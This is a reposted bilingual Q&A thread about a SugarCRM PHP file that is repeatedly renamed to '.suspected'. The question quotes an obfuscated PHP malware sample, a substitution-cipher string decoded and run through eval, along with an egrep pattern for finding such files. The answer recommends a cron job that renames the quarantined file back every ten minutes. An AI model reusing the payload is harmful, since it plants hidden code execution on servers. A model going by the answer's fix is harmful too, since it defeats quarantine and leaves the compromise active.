问题描述
自过去 4 天以来,我们的生产服务器(AWS EC2 实例)遇到了一个奇怪的问题,仅针对一个站点,即 SugarCRM.
Since last 4 days, we are facing strange issue on our Production server (AWS EC2 instance) specific to only one site which is SugarCRM.
问题是 /home/site_folder/public_html/include/MassUpdate.php 文件被自动重命名为 /home/site_folder/public_html/include/MassUpdate.php.suspected
Issue is /home/site_folder/public_html/include/MassUpdate.php file is renamed automatically to /home/site_folder/public_html/include/MassUpdate.php.suspected
这种情况一天发生 2-3 次,间隔 3-4 小时.此问题仅在特定站点的情况下发生,即使对于同一站点的暂存副本也不会发生.我什至从两个站点检查了该文件的代码,它是相同的.
This happens 2-3 times in a day with 3-4 hours of gap. This issue occurs only in case of specific site, even it doesn't occur for staging replica of the same site. I even checked code of that file from both sites, it's same.
我们通过谷歌搜索发现,此类问题主要发生在 Wordpress 网站上,可能是由于攻击所致.但是我们检查了我们的服务器是否受到攻击,没有任何攻击.服务器上也没有运行病毒/恶意软件扫描.
We have Googled and found, such issue occurs mostly for Wordpress sites and it could be because of attack. But we checked our server against the attack, there isn't any. Also there is no virus/malware scan running on server.
我们该怎么办?
更新:通过这个链接后,我们发现了一些东西我们执行了 egrep -Rl 'function.*for.*strlen.*isset'/home/username/public_html/
发现有以下示例代码的文件很少.
Update:We found few things after going through this linkWe executed egrep -Rl 'function.*for.*strlen.*isset' /home/username/public_html/
And found that there are few files with following sample code.
<?php
function flnftovr($hkbfqecms, $bezzmczom){$ggy = ''; for($i=0; $i < strlen($hkbfqecms); $i++){$ggy .= isset($bezzmczom[$hkbfqecms[$i]]) ? $bezzmczom[$hkbfqecms[$i]] : $hkbfqecms[$i];}
$ixo="base64_decode";return $ixo($ggy);}
$s = 'DMtncCPWxODe8uC3hgP3OuEKx3hjR5dCy56kT6kmcJdkOBqtSZ91NMP1OuC3hgP3h3hjRamkT6kmcJdkOBqtSZ91NJV'.
'0OuC0xJqvSMtKNtPXcJvt8369GZpsZpQWxOlzSMtrxCPjcJvkSZ96byjbZgtgbMtWhuCXbZlzHXCoCpCob'.'zxJd7Nultb4qthgtfNMtixo9phgCWbopsZ1X=';
$koicev = Array('1'=>'n', '0'=>'4', '3'=>'y', '2'=>'8', '5'=>'E', '4'=>'H', '7'=>'j', '6'=>'w', '9'=>'g', '8'=>'J', 'A'=>'Y', 'C'=>'V', 'B'=>'3', 'E'=>'x', 'D'=>'Q', 'G'=>'M', 'F'=>'i', 'I'=>'P', 'H'=>'U', 'K'=>'v', 'J'=>'W', 'M'=>'G', 'L'=>'L', 'O'=>'X', 'N'=>'b', 'Q'=>'B', 'P'=>'9', 'S'=>'d', 'R'=>'I', 'U'=>'r', 'T'=>'O', 'W'=>'z', 'V'=>'F', 'Y'=>'q', 'X'=>'0', 'Z'=>'C', 'a'=>'D', 'c'=>'a', 'b'=>'K', 'e'=>'o', 'd'=>'5', 'g'=>'m', 'f'=>'h', 'i'=>'6', 'h'=>'c', 'k'=>'p', 'j'=>'s', 'm'=>'A', 'l'=>'R', 'o'=>'S', 'n'=>'u', 'q'=>'N', 'p'=>'k', 's'=>'7', 'r'=>'t', 'u'=>'2', 't'=>'l', 'w'=>'e', 'v'=>'1', 'y'=>'T', 'x'=>'Z', 'z'=>'f');
eval(flnftovr($s, $koicev));?>
似乎是一些恶意软件,我们如何永久删除它?
Seems some malware, how we go about removing it permanently?
谢谢
推荐答案
发布此答案,可能对其他人有所帮助.
Posting this answer, it may help others.
- 在您方便的位置创建一个带有 '.sh' 扩展名的文件.
- 在其中添加以下代码.
#Rename your_file_name.php.suspected 为 your_file_name.phpmv/<path_to_your_file>/your_file_name.php.suspected/<path_to_your_file>/your_file_name.php
- 保存此文件.
- 在 crontab 中使用以下行,每 10 分钟(或您需要的任何时间间隔)设置 cron
*/10 * * * * path_to_cron_file.sh
- 重启 crontab 服务.
您将获得很多关于在 Google 上创建 cron 的文档.
You will get lot of documentation on creating cron on Google.
这篇关于php 文件自动重命名为 php.suspected的文章就介绍到这了,希望我们推荐的答案对大家有所帮助,也希望大家多多支持!